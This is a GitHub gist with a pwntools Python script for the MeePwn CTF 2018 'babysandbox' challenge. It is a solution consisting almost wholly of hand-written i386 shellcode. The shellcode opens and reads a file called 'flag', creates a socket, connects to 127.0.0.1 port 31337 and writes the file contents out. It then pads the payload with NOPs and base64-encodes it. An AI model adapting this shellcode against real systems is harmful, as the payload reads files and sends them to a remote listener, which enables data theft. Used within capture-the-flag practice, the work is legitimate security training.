Created
July 15, 2018 19:21
-
-
Save hama7230/0c817e743d8218a1927afc5338458b92 to your computer and use it in GitHub Desktop.
MeePwn CTF 2018 Quals babysandbox
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from pwn import * | |
| context(os='linux', arch='i386') | |
| shellcode = ''' | |
| // openat | |
| xor eax, eax | |
| push eax | |
| push 0x67616c66 | |
| mov ebx, -100 | |
| mov ecx, esp | |
| xor edx, edx | |
| xor esi, esi | |
| mov ax, 0x127 | |
| int 0x80 | |
| // readv | |
| mov ebx, eax | |
| mov ax, 0x100 | |
| push eax | |
| mov ecx, esp | |
| inc ecx | |
| inc ecx | |
| inc ecx | |
| inc ecx | |
| push ecx | |
| mov ecx, esp | |
| xor edx, edx | |
| inc edx | |
| xor eax, eax | |
| mov al, 0x91 | |
| int 0x80 | |
| // socket(2, 1, 6); | |
| xor eax, eax | |
| xor ebx, ebx | |
| xor ecx, ecx | |
| push ecx | |
| mov cl, 6 | |
| push ecx | |
| mov cl, 1 | |
| push ecx | |
| mov cl, 2 | |
| push ecx | |
| mov ecx, esp | |
| mov bl, 1 | |
| mov al, 102 | |
| int 0x80 | |
| //connect(sock, sockaddr, 16) | |
| mov edx, eax | |
| xor eax, eax | |
| xor ecx, ecx | |
| push ecx | |
| push ecx | |
| push 0x0100007f // 127.0.0.1 | |
| pushw 0x697a // 31337 | |
| mov cl, 2 | |
| pushw cx | |
| mov edi, esp | |
| mov bl, 16 | |
| push ebx | |
| push edi | |
| push edx | |
| mov ecx, esp | |
| mov bl, 3 | |
| mov al, 102 | |
| int 0x80 | |
| // writev | |
| mov ebx, edx | |
| lea ecx, [esp+0x2c] | |
| xor eax, eax | |
| mov dl, 1 | |
| mov al, 0x92 | |
| int 0x80 | |
| ''' | |
| payload = asm(shellcode) | |
| payload = payload.ljust(0x100, '\x90') | |
| print payload.encode('base64') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment